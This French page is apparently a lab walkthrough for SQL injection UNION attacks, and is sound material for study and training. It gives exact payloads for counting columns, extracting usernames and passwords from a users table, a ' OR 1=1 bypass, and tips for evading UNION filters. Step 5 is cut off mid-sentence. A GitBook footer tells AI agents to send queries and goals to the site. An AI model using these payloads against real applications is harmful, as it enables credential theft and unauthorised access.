> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/fr/web/sql-injection/union-attack-retrieving-data-from-other-tables.md).

# Attaque UNION pour extraire des données d’autres tables

### Attaque par injection SQL UNION, récupération de données depuis d'autres tables

**Contexte :** `category` filtre vulnérable à l'injection ; la réponse produit des résultats SQL, donc un `UNION SELECT` permet d'injecter et d'afficher des lignes d'autres tables.

**Objectif du laboratoire :** récupérer toutes `le nom d'utilisateur` / `mot de passe` de la `users` table puis se connecter en tant que `administrateur`.

#### Étapes (ordre, charges utiles exactes)

1. **Déterminer le nombre de colonnes** (si inconnu) :

   ```sql
   ' ORDER BY 1-- -
   ' ORDER BY 2-- -
   ' ORDER BY 3-- -
   ```

Lorsque `ORDER BY N` provoque une erreur, le nombre de colonnes < N. 2. **Valider `UNION`** (même nombre de colonnes que la requête d'origine) : / Exemple si la requête renvoie 2 colonnes :

````
```sql
' UNION SELECT '1','2'-- -
```
````

ou avec `NULL` pour les colonnes non pertinentes :

````
```sql
' UNION SELECT NULL, NULL-- -
```
````

3\. **Extrayez `le nom d'utilisateur` / `mot de passe`** (ajuster le nombre/l'ordre des colonnes) : / Si la requête d'origine a **2 colonnes**:

````
```sql
' UNION SELECT username, password FROM users-- -
```
````

S'il en a **3 colonnes**, placez `NULL` pour la colonne inutilisée, par ex. (texte en deuxième position) :

````
```sql
' UNION SELECT NULL, username, password FROM users-- -
```
````

— Si les types sont incompatibles : utilisez `CAST`/`TO_CHAR` ou `NULL` pour force la compatibilité :

````
```sql
' UNION SELECT CAST(username AS CHAR), CAST(password AS CHAR) FROM users-- -
```
````

4\. **Vérifiez la sortie** — la réponse doit contenir `le nom d'utilisateur`/`mot de passe` paires.

* Trouvez les `administrateur` ligne et enregistrez son mot de passe.
* Utilisez ces identifiants sur la page de connexion.

5. **Alternative (si l'exfiltration échoue)** — contourner d

   ```sql
   ' OR 1=1-- -
   ```

(moins de preuves que l'extraction ; privilégiez l'exfiltration si possible.)

#### Détails techniques

* Utilisez des constantes séparées (ou `NULL`) pour identifier quelles colonnes sont affichées.
* Oracle : noms en MAJUSCULES s'ils ne sont pas entre guillemets ; peut nécessiter `TO_CHAR`.
* MSSQL/MySQL/Postgres : `CAST`/`CONVERT`/`::text` si les types sont différents.
* Si `UNION` bloqué, testez des changements dans les espaces/commentaires ou les fonctions pour reconstruire la chaîne (`CONCAT`, `CHR`/`CHAR`).

#### Impact résumé

* Identifiants (administrateur), contrôle de l'application, exfiltration/ modification de données.


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/fr/web/sql-injection/union-attack-retrieving-data-from-other-tables.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
